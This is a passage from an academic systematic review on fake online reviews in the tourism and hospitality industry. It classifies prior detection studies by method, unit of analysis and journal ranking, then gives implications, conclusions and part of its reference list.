aspects of comprehension, level of detail, writing form, and cognitive indicators Tourism Banerjee et al. (2015) This study investigates false reviews published on TripAdvisor. After completing a survey, users are invited to write fake hotel reviews Tourism Cardoso, Silva & Almeida (2018) This paper is an exhaustive review of the content analysis methods of false review detection. To this end, the authors develop experiments based on Hotels Tourism Chang et al. (2015) In this study, a rumor model is used to detect false reviews on the TripAdvisor platform based on the following three characteristics of the content: important attribute words, quantifiers, and the ratio of names and verbs. The proposed model reduces the possibility of obtaining false reviews Tourism Deng & Chen (2014) This study focuses on the development of an algorithm, based on sentiment analysis, to identify false reviews of restaurants. The results demonstrate that the proposed algorithm has the predictive capacity of over 70% Tourism Hunt (2015) This study focuses on the legal aspect of fake reviews and argues for the adoption of specific laws to prohibit the publication of false reviews Tourism Lappas, Sabnis & Valkanas (2016a) and Lappas, Sabnis & Valkanas (2016b) The analysis is based on over 2.3 million comments from 4,709 hotels in 17 cities to understand the impact of false reviews on the visibility of establishments. The results suggest that, with only 50 false reviews in some markets, competitors can be overtaken in terms of visibility Tourism Li, Feng & Zhang (2016) Based on the density of the reviews, as well as their semantic aspects and emotional aspects, this study creates an algorithm for false review detection based on review content applicable to the tourism industry Tourism Munzel (2016) This study analyzes published reviews and rejected reviews taking into account the information about the author, age, and stars the user has been given in recently published reviews. The results emphasize the importance of the previous history of users who publish reviews for false review detection Tourism Chen, Guo & Deng (2014) This study proposes an algorithm based on sentiment analysis to identify false reviews in restaurants. The results demonstrate that the proposed algorithm has the predictive capacity of 74% Restaurants - Hospitality Industry Li et al. (2014) This study focuses on the Dianping, China’s largest restaurant review platform, and analyzes the dependencies among reviews, users, and IP addresses using an algorithm called Multi-typed Heterogeneous Collective Classification (MHCC), and then extends it to Collective Positive and Unlabeled learning (CPU) Restaurants - Hospitality Industry (continued on next page) Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Table 1 (continued) Authors Study description Study industry Li et al. (2018) In this study, the Louvain community detection method is used to study online communities. The results suggest that false reviews predominate in profiles with low scores, and that the more followers a community has, the greater the number of false reviews Restaurants - Hospitality Industry Luca & Zervas (2016) This study analyzes the reviews published on the Yelp site. The results demonstrate that only 16% of the reviews are filtered (those that more extreme, either positively or negatively). The restaurants that usually publish false reviews are those with fewer comments or negative comments. Restaurant chains usually publish fewer false reviews. Finally, more competitive restaurants are more likely to get false reviews Restaurants - Hospitality Industry Elmurngi & Gherbi (2017) In this study, textual classification and sentiment analysis are used to identify false reviews in E-commerce. Four rating sentiment classification algorithms are compared: Naïve Bayes (NB), Support Vector Machine (SVM), K-Nearest Neighbors (KNN-IBK), and Decision Tree (DT-J48). The results show that algorithms can effectively predict false reviews E-Commerce Lin et al. (2014) This study proposes a new approach to identifying false reviews that is based on the content of the reviews and the behavior of the users. The results show that the proposed approach is more precise and accurate than current algorithms All Industries Ramalingam & Chinnaiah (2018) This study reviews the latest algorithms of false profile detection in social networks All Industries Zhang et al. (2016) This study analyzes non-verbal characteristics of users who write false reviews to create a predictive algorithm of detection of false reviews. The algorithm can complement the traditional method of detection of false reviews All Industries Hunt (2015) focuses on the example of the UK Advertising Standards Authority that found against the tourism social platform TripAdvisor. These figures explain the concern of establishments in the tourism sector about the phenomenon of false reviews. In what follows, we review the methodologies used in previous research on false reviews in the tourism industry. Particular attention is paid to the unit of analysis focused on in previous studies and the behavioral approach to the analysis and identification of online fake reviews in tourism. Methodologies used in previous research First, most studies in the present systematic review of the literature focus on analysis of the algorithms of false review detection and their improvement. In these studies, large amounts of data from social communities such as TripAdvisor or Yelp are typically used (Chang et al., 2015; Li et al., 2014). The second most used methodology is sentiment analysis, focusing on the emotional aspects and feelings expressed in written reviews. In this methodology, comments are classified as positive, negative or neutral according to the words contained in them (Chen, Guo & Deng, 2014; Deng & Chen, 2014; Elmurngi & Gherbi, 2017). The Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 9/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Table 2 Classification of previous studies according to their methodology. Authors Algorithms Sentiment analysis Other methodologies Banerjee & Chua (2014) √ Banerjee et al. (2015) √ Cardoso, Silva & Almeida (2018) √ Chang et al. (2015) √ Li et al. (2014) √ Li, Feng & Zhang (2016) √ Li et al. (2018) √ Luca & Zervas (2016) √ Lappas, Sabnis & Valkanas (2016a) and Lappas, Sabnis & Valkanas (2016b) √ Chen, Guo & Deng (2014) √ Deng & Chen (2014) √ Elmurngi & Gherbi (2017) √ Lin et al. (2014) √ Zhang et al. (2016) √ Hunt (2015) √ Munzel (2016) √ Ramalingam & Chinnaiah (2018) √ third direction of research comprises other methodologies that aim to either discover new knowledge to be implemented in false review detection for tourism businesses (Hunt, 2015) or perform the analysis of legal aspects and measures that countries like the United Kingdom or Australia take to counteract false reviews (Ramalingam & Chinnaiah, 2018). Table 2 provides a classification of the studies reviewed in the present study into the aforementioned three groups. Unit of analysis The studies reviewed in this paper approach the phenomenon of false reviews differently. For some studies (Li et al., 2014; Lin et al., 2014; Ramalingam & Chinnaiah, 2018) the major units of analysis are profiles of users who write reviews. These studies seek patterns that would help better identify profiles that are more likely to generate false reviews. For other studies, the major unit of analysis is the content of online reviews. Here, the studies tend to focus on two types of content. On the one hand, some studies focus on the textual content of reviews, i.e., on their linguistic aspects, such as the ratio of nouns to verbs, the type of words or the attributes used to write false reviews (Banerjee et al., 2015; Cardoso, Silva & Almeida, 2018; Chang et al., 2015; Chen, Guo & Deng, 2014; Deng & Chen, 2014; Elmurngi & Gherbi, 2017; Lappas, Sabnis & Valkanas, 2016a; Lappas, Sabnis & Valkanas, 2016b). On the other hand, there are studies that prioritize detecting behavioral and emotional characteristics of users who write false reviews (Banerjee & Chua, 2014; Li, Feng & Zhang, 2016; Li et al., 2018; Luca & Zervas, 2016; Zhang et al., 2016). Munzel (2016) focuses the research on both the textual and the behavioral aspects. At the same time, Hunt (2015) does a review of the legal aspects that concern fake reviews, such that the unit of Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 10/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Table 3 Classification of previous studies according to their unit of analysis. Authors User profile Content Textual Behavioral Li et al. (2014) √ – – Lin et al. (2014) √ – – Ramalingam & Chinnaiah (2018) √ – – Banerjee et al. (2015) – √ – Cardoso, Silva & Almeida (2018) – √ – Chang et al. (2015) – √ – Chen, Guo & Deng (2014) – √ – Deng & Chen (2014) – √ – Elmurngi & Gherbi (2017) – √ – Lappas, Sabnis & Valkanas (2016a) and Lappas, Sabnis & Valkanas (2016b) – √ – Munzel (2016) – √ √ Banerjee & Chua (2014) – – √ Li, Feng & Zhang (2016) – – √ Li et al. (2018) – – √ Luca & Zervas (2016) – – √ Zhang et al. (2016) – – √ Hunt (2015) – – – analysis is neither user profile nor content. In Table 3, the reviewed studies are classified into the aforementioned three groups. Scientometric analysis In the next step, in order to gain a better understanding of which areas of research focused more on false reviews, scientometric analysis was performed. Here, we followed a previous study by Saura, Palos-Sánchez & Suárez (2017). A scientometric analysis is the quantitative and qualitative analysis of science and scientific outcomes. This concept was first created by Price (1963) and has been widely used as a complementary analysis of systematic literature reviews (Saura, Palos-Sánchez & Suárez, 2017) or as the major topic of the study (Kullenberg & Kasperowski, 2016). In their work, Kollwitz & Papathanassis (2011) highlighted the importance of using qualitative methods, such as Delphi techniques for the tourism industry, and Walle (1997) supported using a combination of qualitative with quantitative analysis in the tourism sector. In Table 4, the results of both qualitative and quantitative analysis are summarized with respect to the Author, Journal indexed in JCR ranking and its Category and Quartile. The Author field is included to trace the analysis conducted by the authors throughout the article. The Quartile and Category reflect all the categories that the journal has according to its Web of Science classification and, in case the Quartile was different for different Categories, that is also reflected in the table. The discipline with the highest number of publications was Computer Science as can be seen in Table 4. There are a total of 11 publications that belong to the category Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 11/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Table 4 Scientometric classification. Author Journal Quartile Category Banerjee & Chua (2014) 9th International Conference on Digital Information Management (ICDIM) – Computer Science, Information Systems; Computer Science, Theory & Methods; Engineering, Electrical & Electronic Banerjee et al. (2015) 9th International Conference on Ubiquitous Information Management and Communication (ACM IMCOM) – Computer Science, Theory & Methods Cardoso, Silva & Almeida (2018) Neurocomputing Q1 Computer Science; Artificial Intelligence Chang et al. (2015) Lecture Notes in Computer Science Q4 Computer Science, Theory & Methods Chen, Guo & Deng (2014) Lecture Notes in Computer Science Q4 Computer Science Deng & Chen (2014) Lecture Notes in Computer Science Q4 Computer Science, Theory & Methods Elmurngi & Gherbi (2017) 7th International Conference on Innovative Computing Technology (INTECH) – Computer Science, Hardware & Architecture; Computer Science, Software Engineering; Computer Science, Theory & Methods Hunt (2015) Computer Law and Security Review Q2 Law Lappas, Sabnis & Valkanas (2016a) and Lappas, Sabnis & Valkanas (2016b) Information Systems Research Q2 Management Information Science & Library Science Li, Feng & Zhang (2016) 2016 3RD International Conference on Information Science and Control Engineering (ICISCE) – Automation & Control Systems, Computer Science, Theory & Methods Li et al. (2014) IEEE International Conference on Data Mining (ICDM) – Computer Science, Artificial Intelligence; Computer Science, Information Systems Li et al. (2018) China Communications Q3 Telecommunications Lin et al. (2014) 2014 Proceedings of the IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM 2014) – Computer Science, Information Systems; Computer Science, Theory & Methods Luca & Zervas (2016) Management Science Q1 Management Operations Research & Management Science Munzel (2016) Journal of Retailing and Customer Services Q2 Business Ramalingam & Chinnaiah (2018) Computers and Electronical Engineering Q2 Computer Science; Engineering, Electrical & Electronic Q3 Computer Science, Interdisciplinary Zhang et al. (2016) Journal of Management Information Systems Q2 Management Computer Science, Information Systems Q1 Information Science & Library Science R eyes-M enendez etal. (2019),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.219 12/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 of Computer Science and six that fall into the category of Computer Science Theory & Methods. The next category is Information Systems which has four publications. Other disciplines include Management (three publications), and Operations Research, Management Science, and Business (one publication each). This indicates that fake reviews are of interest to both computer scientists who develop the algorithms of false review detection and the management of companies and businesses that is willing to improve the detection of fake reviews that undermine the credibility of these platforms. All reviewed studies come from the disciplines of Artificial Intelligence, Automation & Control Systems, Business, Computer Science, Computer Science Theory & Methods, Engineering Electrical & Electronic, Hardware & Architecture, Information Systems, Information Science & Library Science, Interdisciplinary, Software Engineering, Law, Management, Operations Research & Management Science and finally, Telecommunications. All journals have only published one paper, except for the journal Lecture Notes in Computer Science that published three articles (Chen, Guo & Deng, 2014; Deng & Chen, 2014; Chang et al., 2015). It is also interesting to note that six of the papers that were listed in the database of the Web of Science and for which we could extract the category were published as Conference Proceedings; therefore, their Quartile could not be analyzed. Regarding the Quartile of the remaining papers, we took the highest rated category in the case when there was more than one category with different Quartiles. Therefore, three of them were Q1, four were Q2, and three were Q4. IMPLICATIONS Implications for managers The results of the present study underscore the importance of online reviews for the tourism industry not only on major websites (Papathanassis, 2011), but also on other type of platforms that require managerial attention for proper brand management (Saura, Palos-Sanchez & Reyes-Menendez, 2017). Nowadays, online review sites and social media websites have become an important source of information for consumers and exert a strong influence on consumer purchase behavior and decision making (Gretzel et al., 2006; Kim, Kandampully & Bilgihan, 2018; Manes & Tchetchik, 2018; Reyes-Menendez et al., 2018). Therefore, efficient collection and analysis of fake online reviews can help companies to remain competitive in this industry (Hennig-Thurau, Walsh & Walsh, 2003; Hu et al., 2011; Lin et al., 2006; Zhang et al., 2016). The ubiquitous presence of fake online reviews on review and social networking sites creates an asymmetry in the information that consumers get about a company. However, when managers track customer comments, the information asymmetry is reduced (Manes & Tchetchik, 2018). The growth in the number of fake reviews in the tourism industry and the influence of these references on customer behavior and decision making has driven numerous managers to explore the phenomenon of fake reviews and consider the application of new online content strategies (Li, Feng & Zhang, 2016; Li et al., 2018; Ramalingam & Chinnaiah, 2018; Reyes-Menendez et al., 2018). Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 13/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 Considering that fake reviews have the power to provide more visibility for companies and affect their behavior (Lappas, Sabnis & Valkanas, 2016a; Lappas, Sabnis & Valkanas, 2016b), it is necessary to reinforce the creation of online reviews from real customers, avoid the creation of fake reviews, and develop content strategies to support and promote customers who are willing to write true information for other customers online. Implications for researchers Despite the extensive scientific research on fake reviews that offers some solutions to counteract them, it is important to continue improving the algorithms of false review detection on social platforms in the tourism sector. To this end, researchers engaged in this field of study should have a thorough understanding of the available results. As demonstrated in the present review, different methods have been used in previous research on false reviews. These include the development of algorithms based on Big Data from the social platforms themselves (e.g., Chang et al., 2015; Li et al., 2014) as well as sentiment analysis of written comments (Chen, Guo & Deng, 2014; Deng & Chen, 2014; Elmurngi & Gherbi, 2018). Finally, there is a group of studies that used other methodological approaches (Hunt, 2015; Ramalingam & Chinnaiah, 2018). Researchers may apply our results to reinforce the theoretical frameworks of their scholarship by correctly choosing a methodological procedure for their research. It is also important to consider the units of analysis for future research studies in this area. We noted that while some studies focused on user profiles (Li et al., 2014), most extant research focused on the content of reviews. In the latter group of studies, attention was paid either to the texts and their linguistic characteristics (e.g., Banerjee et al., 2015; Cardoso, Silva & Almeida, 2018; Chang et al., 2015) or to the emotions and behavior of users that could be inferred from reviews (e.g., Banerjee & Chua, 2014; Banerjee et al., 2015; Li, Feng & Zhang, 2016; Lin et al., 2014; Zhang et al., 2016). CONCLUSIONS This exploratory study has defined the scope and identified recent avenues of research on fake online reviews in the tourism industry. Interestingly, even though consumers might be aware that some comments are fictitious, they still rely on them to make decisions (Manes & Tchetchik, 2018). However, although many studies have investigated the impact of eWOM in the tourism industry (Mauri & Minazzi, 2013; Vermeulen & Seegers, 2009; Xie et al., 2011), further research on the impact of new approaches is necessary to detect fake online reviews for tourism businesses. As suggested by our literature review, to counteract this trend, tourism companies must constantly improve their methods of detecting false reviews. These methods are mainly based on algorithms (Banerjee & Chua, 2014; Banerjee et al., 2015), and the improvements are especially based on behavioral approaches (Li, Feng & Zhang, 2016; Zhang et al., 2016). In addition, in order not to lose their visitors’ trust (Ladhari & Michaud, 2015), platforms that allow users to write reviews about their experiences with tourism companies take legal Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 14/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 action against false reviews (Hunt, 2015). When a company spots fake reviews, it has the right to take action. TripAdvisor has fought fraudulent reviews in thousands of lawsuits. The systematic review of the literature undertaken in the present study allows us to make the following three conclusions. First, our results demonstrate that there is an ever-growing interest, among scientific and consumer communities alike, in the credibility of online reviews in the tourism sector with an interdisciplinary approach. Not only have Computer Science and Information Systems (e.g., Chen, Guo & Deng, 2014; Chang et al., 2015; Li et al., 2014; Zhang et al., 2016) published research about fake reviews but also Management, Business and Operation Research and Management Science (e.g., (Lappas, Sabnis & Valkanas, 2016a; Lappas, Sabnis & Valkanas, 2016b; Luca & Zervas, 2016); (Munzel, 2016). Consumer concern about fake reviews is particularly pronounced (see Figs. 1 and 2). Second, the results of both scientometric analysis and our literature review suggest that the methods of Computer Science are most frequently used in terms of the development and improvement of the methods to detect false reviews. Most publications included in the literature review (14) fall into the category of algorithms (eight) and sentiment analysis (six), while only a few of them (three) use other methods. Third, our systematic review of the literature highlights the importance of further development of new methods for identifying false reviews based on the following criteria: (1) those based on emotional approaches; (2) those based on semantic analysis; and (3) those based on new technologies. Some of these methods are based on a behavioral and emotional analysis of the text of reviews in the tourism sector (Banerjee & Chua, 2014; Li et al., 2018; Luca & Zervas, 2016; Munzel, 2016; Zhang et al., 2016). To this end, sentiment analysis and textual analysis were used (Chen, Guo & Deng, 2014; Deng & Chen, 2014; Elmurngi & Gherbi, 2017; Lappas, Sabnis & Valkanas, 2016a; Lappas, Sabnis & Valkanas, 2016b; Lin et al., 2014; Zhang et al., 2016). Other methods are focused on the semantic analysis of the reviews (Li, Feng & Zhang, 2016; Luca & Zervas, 2016) and provide guidelines to follow in order to detect fraudulent reviews. Some of these clues are based on extreme comments and ratings, as well as on comments lacking detail or reviews where first-person pronouns (e.g., I, me) are widely used to simulate sincerity. Finally, some methods to improve the detection of fake reviews are mostly supported by new technologies (Li et al., 2014) and present novel solutions for fake review detection. One of these technologies is the Blockchain, which requires proof of payment in order to publish a review. The limitations of this study relate to the number of studies reviewed and the databases consulted. Although the authors consulted the main scientific databases—Scopus, PubMed, PsyINFO, ScienceDirect and Web of Science—there are more databases available for consultation. While our review of the literature has highlighted several important issues related to fake reviews in the tourism sector, further research that would perform in-depth analysis of specific aspects presented in this paper is needed. Among such possibilities is using Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 15/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219 quantitative techniques to measure the impact of fake reviews on social networking sites. Another promising area of future research is studying the behavioral aspects of users who write online reviews for tourism businesses. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Ana Reyes-Menendez conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. • Jose Ramon Saura conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper. • Ferrão Filipe performed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: This is a review article and does not have raw data. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.219#supplemental-information. REFERENCES AMSTAR. 2017. AMSTAR is a reliable and valid measurement tool to assess the method- ological quality of systematic reviews. 19230606. Available at www.ncbi.nlm.nih.gov/ pubmed/ (accessed on 12 September 2017). Banerjee A, Duflo E, Glennerster R, Kinnan C. 2015. The miracle of microfinance? evidence from a randomized evaluation. American Economic Journal: Applied Economics 7(1):22–53 DOI 10.1257/app.20130533. Banerjee S, Chua AY. 2014. Understanding the process of writing fake online reviews. In: Ninth international conference on digital information management (ICDIM 2014). Piscataway: IEEE DOI 10.1109/icdim.2014.6991395. Banerjee S, Chua AY, Kim J. 2015. Using supervised learning to classify authentic and fake online reviews. New York: ACM DOI 10.1145/2701126.2701130. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 16/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.219#supplemental-information http://dx.doi.org/10.7717/peerj-cs.219#supplemental-information www.ncbi.nlm.nih.gov/pubmed/ www.ncbi.nlm.nih.gov/pubmed/ http://dx.doi.org/10.1257/app.20130533 http://dx.doi.org/10.1109/icdim.2014.6991395 http://dx.doi.org/10.1145/2701126.2701130 http://dx.doi.org/10.7717/peerj-cs.219 Bassett D. 2015. Who wants to live forever? living, dying and grieving in our digital society. Social Sciences 4(4):1127–1139 DOI 10.3390/socsci4041127. Bennett D, Yábar DPB, Saura JR. 2017. University incubators may be socially valuable, but how effective are they? a case study on business incubators at universities. In: PerisOrtiz M, Gómez J, Merigó-Lindahl J, Rueda-Armengot C, eds. Entrepreneurial universities. Innovation, technology, and knowledge management. Cham, Switzerland: Springer DOI 10.1007/978-3-319-47949-1_11. Buhalis D, Law R. 2008. Progress in information technology and tourism management: 20 years on and 10 years after the Internet—The state of eTourism research. Tourism Management 29(4):609–623 DOI 10.1016/j.tourman.2008.01.005. Cardoso EF, Silva RM, Almeida TA. 2018. Towards automatic filtering of fake reviews. Neurocomputing 309:106–116 DOI 10.1016/j.neucom.2018.04.074. Chang T, Hsu PY, Cheng MS, Chung CY, Chung YL. 2015. Detecting fake review with rumor model—case study in hotel review. In: Intelligence science and big data engineering. Big data and machine learning techniques lecture notes in computer science. 181–192 DOI 10.1007/978-3-319-23862-3_18. Chen RY, Guo JY, Deng XL. 2014. Detecting fake reviews of hype about restaurants by sentiment analysis. In: Web-Age Information Management Lecture Notes in Computer Science. vol 8597. Cham: Springer, 22–30 DOI 10.1007/978-3-319-11538-2_3. Cheng LC, Tseng JC, Chung TY. 2017. Case study of fake web reviews. In: Proceedings of the 2017 IEEE/ACM international conference on advances in social networks analysis and mining 2017. New York: ACM, 706–709. Cheung CM, Thadani DR. 2012. The impact of electronic word-of-mouth commu- nication: a literature analysis and integrative model. Decision Support Systems 54(1):461–470 DOI 10.1016/j.dss.2012.06.008. Chevalier J, Mayzlin D. 2003. The effect of word of mouth on sales: online book reviews. Journal of Marketing Research 43(3):345–354 DOI 10.3386/w10148. Chew S, Metheney E, Teague T. 2017. Modelling and simulation of the formation of social networks. Social Sciences 6(3):79–90 DOI 10.3390/socsci6030079. Comerio N, Strozzi F. 2018. Tourism and its economic impact: a literature review using bibliometric tools. Tourism Economics 25(1):109–131 DOI 10.1177/1354816618793762. Deng X, Chen R. 2014. Sentiment analysis based online restaurants fake reviews hype detection. In: Web Technologies and Applications Lecture Notes in Computer Science. Cham: Springer, 1–10 DOI 10.1007/978-3-319-11119-3_1. Elmurngi E, Gherbi A. 2017. An empirical study on detecting fake reviews using machine learning techniques. In: 2017 seventh international conference on innovative computing technology (INTECH). DOI 10.1109/intech.2017.8102442. Elmurngi EI, Gherbi A. 2018. Unfair reviews detection on amazon reviews using sentiment analysis with supervised learning techniques. Journal of Computer Science 14(5):714–726 DOI 10.3844/jcssp.2018.714.726. Google Trends. 2018. Available at www.google.com/trends (accessed on 15 December 2018). Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 17/21 https://peerj.com http://dx.doi.org/10.3390/socsci4041127 http://dx.doi.org/10.1007/978-3-319-47949-1_11 http://dx.doi.org/10.1016/j.tourman.2008.01.005 http://dx.doi.org/10.1016/j.neucom.2018.04.074 http://dx.doi.org/10.1007/978-3-319-23862-3_18 http://dx.doi.org/10.1007/978-3-319-11538-2_3 http://dx.doi.org/10.1016/j.dss.2012.06.008 http://dx.doi.org/10.3386/w10148 http://dx.doi.org/10.3390/socsci6030079 http://dx.doi.org/10.1177/1354816618793762 http://dx.doi.org/10.1007/978-3-319-11119-3_1 http://dx.doi.org/10.1109/intech.2017.8102442 http://dx.doi.org/10.3844/jcssp.2018.714.726 www.google.com/trends http://dx.doi.org/10.7717/peerj-cs.219 Gottschalk SA, Mafael A. 2017. Cutting through the online review jungle—investigating selective eWOM processing. Journal of Interactive Marketing 37:89–104 DOI 10.1016/j.intmar.2016.06.001. Gretzel U, Fesenmaier DR, Formica S, O’Leary JT. 2006. Searching for the future: challenges faced by destination marketing organizations. Journal of Travel Research 45(2):116–126 DOI 10.1177/0047287506291598. Gretzel U, Yoo KH. 2008. Use and impact of online travel reviews. In: Informa- tion and Communication Technologies in Tourism. Vienna: Springer, 35–46 DOI 10.1007/978-3-211-77280-5_4. Hennig-Thurau T, Walsh G, Walsh G. 2003. Electronic word-of-mouth: motives for and consequences of reading customer articulations on the internet. International Journal of Electronic Commerce 8(2):51–74 DOI 10.1080/10864415.2003.11044293. Hubert M, Blut M, Brock C, Backhaus C, Eberhardt T. 2017. Acceptance of smartphone-based mobile shopping: Mobile benefits, customer characteristics, perceived risks, and the impact of application context. Psychology & Marketing 34(2):175–194 DOI 10.1002/mar.20982. Huete-Alcocer N. 2017. A literature review of word of mouth and electronic word of mouth: implications for consumer behavior. Frontiers in Psychology 8:1256–1260 DOI 10.3389/fpsyg.2017.01256. Hunt KM. 2015. Gaming the system: fake online reviews v. consumer law. Computer Law and Security Review 31(1):3–25 DOI 10.1016/j.clsr.2014.11.003. Kazakov S, Predvoditeleva M. 2015. How travelers use online and social media channels to make hotel choice decisions. A comparative study of Russian Federation and American tourists’ online consumer behavior. Higher School of Economics Research Paper No. WP BRP 44/MAN/2015 DOI 10.2139/ssrn.2698138. Kim S, Kandampully J, Bilgihan A. 2018. The influence of eWOM communications: an application of online social network framework. Computers in Human Behavior 80:243–254 DOI 10.1016/j.chb.2017.11.015. Kollwitz H, Papathanassis A. 2011. Evaluating cruise demand forecasting practices: a Delphi approach. In: Gibson P, Papathanassis A, Milde P, eds. Cruise sector challenges. Wiesbaden: Gabler Verlag, 39–55 DOI 10.1007/978-3-8349-6871-5_3. Kullenberg C, Kasperowski D. 2016. What is citizen science?—a scientometric meta- analysis. PLOS ONE 11(1):e0147152 DOI 10.1371/journal.pone.0147152. Ladhari R, Michaud M. 2015. EWOM effects on hotel booking intentions, attitudes, trust, and website perceptions. International Journal of Hospitality Management 46:36–45 DOI 10.1016/j.ijhm.2015.01.010. Lappas T, Sabnis G, Valkanas G. 2016a. The impact of fake reviews on online visibility: a vulnerability assessment of the hotel industry. Information Systems Research 27(4):940–961 DOI 10.1287/isre.2016.0674. Lappas T, Sabnis G, Valkanas G. 2016b. The impact of fake reviews on online visibility: a vulnerability assessment of the hotel industry. Information Systems Research 27(4):940–961 DOI 10.1287/isre.2016.0674. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 18/21 https://peerj.com http://dx.doi.org/10.1016/j.intmar.2016.06.001 http://dx.doi.org/10.1177/0047287506291598 http://dx.doi.org/10.1007/978-3-211-77280-5_4 http://dx.doi.org/10.1080/10864415.2003.11044293 http://dx.doi.org/10.1002/mar.20982 http://dx.doi.org/10.3389/fpsyg.2017.01256 http://dx.doi.org/10.1016/j.clsr.2014.11.003 http://dx.doi.org/10.2139/ssrn.2698138 http://dx.doi.org/10.1016/j.chb.2017.11.015 http://dx.doi.org/10.1007/978-3-8349-6871-5_3 http://dx.doi.org/10.1371/journal.pone.0147152 http://dx.doi.org/10.1016/j.ijhm.2015.01.010 http://dx.doi.org/10.1287/isre.2016.0674 http://dx.doi.org/10.1287/isre.2016.0674 http://dx.doi.org/10.7717/peerj-cs.219 Li H, Chen Z, Liu B, Wei X, Shao J. 2014. Spotting fake reviews via collective positive- unlabeled learning. In: 2014 IEEE international conference on data mining. Piscataway: IEEE DOI 10.1109/icdm.2014.47. Li N, Du S, Zheng H, Xue M, Zhu H. 2018. Fake reviews tell no tales? dissecting click farming in content-generated social networks. China Communications 15(4):98–109 DOI 10.1109/cc.2018.8357744. Li Y, Feng X, Zhang S. 2016. Detecting fake reviews utilizing semantic and emotion model. In: 3rd international conference on information science and control engineering (ICISCE). Piscataway: IEEE DOI 10.1109/icisce.2016.77. Lin Y, Zhu T, Wu H, Zhang J, Wang X, Zhou A. 2014. Towards online anti-opinion spam: spotting fake reviews from the review sequence. In: 2014 IEEE/ACM interna- tional conference on advances in social networks analysis and mining (ASONAM 2014). Piscataway: IEEE DOI 10.1109/asonam.2014.6921594. Litvin SW, Goldsmith RE, Pan B. 2008. Electronic word-of-mouth in hospitality and tourism management. Tourism Management 29(3):458–468 DOI 10.1016/j.tourman.2007.05.011. Luca M, Zervas G. 2016. Fake it till you make it: reputation, competition, and yelp review fraud. Management Science 62(12):3393–3672 DOI 10.1287/mnsc.2015.2304. Luo Y, Chen Y, Zheng W. 2016. A literature review on evaluating tourism destinations. In: ISME 2016—Information Science and Management Engineering IV—Volume 1: ISME. DOI 10.5220/0006449903290334. Luo Q, Zhong D. 2015. Using social network analysis to explain communication characteristics of travel-related electronic word-of-mouth on social networking sites. Tourism Management 46:274–282 DOI 10.1016/j.tourman.2014.07.007. Manes E, Tchetchik A. 2018. The role of electronic word of mouth in reducing infor- mation asymmetry: an empirical investigation of online hotel booking. Journal of Business Research 85:185–196 DOI 10.1016/j.jbusres.2017.12.019. Mauri AG, Minazzi R. 2013. Web reviews influence on expectations and purchasing intentions of hotel potential customers. International Journal of Hospitality Manage- ment 34:99–107 DOI 10.1016/j.ijhm.2013.02.012. Moher D, Liberati A, Tetzlaff J, Altman DG. 2009. Preferred reporting items for systematic reviews and meta-analyses: the PRISMA statement. Journal of Clinical Epidemiology 62(10):1006–1012 DOI 10.1016/j.jclinepi.2009.06.005. Moutinho L, Ballantyne R, Rate S. 2011. Consumer behaviour in tourism. Strategic Management in Tourism 1:83–126 DOI 10.1079/9781845935887.0083. Munar AM, Jacobsen JK. 2014. Motivations for sharing tourism experiences through social media. Tourism Management 43:46–54 DOI 10.1016/j.tourman.2014.01.012. Munzel A. 2016. Assisting consumers in detecting fake reviews: the role of identity information disclosure and consensus. Journal of Retailing and Consumer Services 32:96–108 DOI 10.1016/j.jretconser.2016.06.002. Önder I, Gunter U. 2016. Forecasting tourism demand with google trends for a major european city destination. Tourism Analysis 21(2):203–220. Reyes-Menendez et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.219 19/21 https://peerj.com http://dx.doi.org/10.1109/icdm.2014.47 http://dx.doi.org/10.1109/cc.2018.8357744 http://dx.doi.org/10.1109/icisce.2016.77 http://dx.doi.org/10.1109/asonam.2014.6921594 http://dx.doi.org/10.1016/j.tourman.2007.05.011 http://dx.doi.org/10.1287/mnsc.2015.2304 http://dx.doi.org/10.5220/0006449903290334 http://dx.doi.org/10.1016/j.tourman.2014.07.007 http://dx.doi.org/10.1016/j.jbusres.2017.12.019 http://dx.doi.org/10.1016/j.ijhm.2013.02.012 http://dx.doi.org/10.1016/j.jclinepi.2009.06.005 http://dx.doi.org/10.1079/9781845935887.0083 http://dx.doi.org/10.1016/j.tourman.2014.01.012 http://dx.doi.org/10.1016/j.jretconser.2016.06.002 http://dx.doi.org/10.7717/peerj-cs.219 Pai M, Chu H, Wang S, Chen Y. 2013. Electronic word of mouth analysis for service experience. Expert Systems with Applications 40(6):1993–2006 DOI 10.1016/j.eswa.2012.10.024. Papathanassis A. 2011. Revisiting the tourism long-tail Scenario. The Long Tail of Tourism 21:3–220 DOI 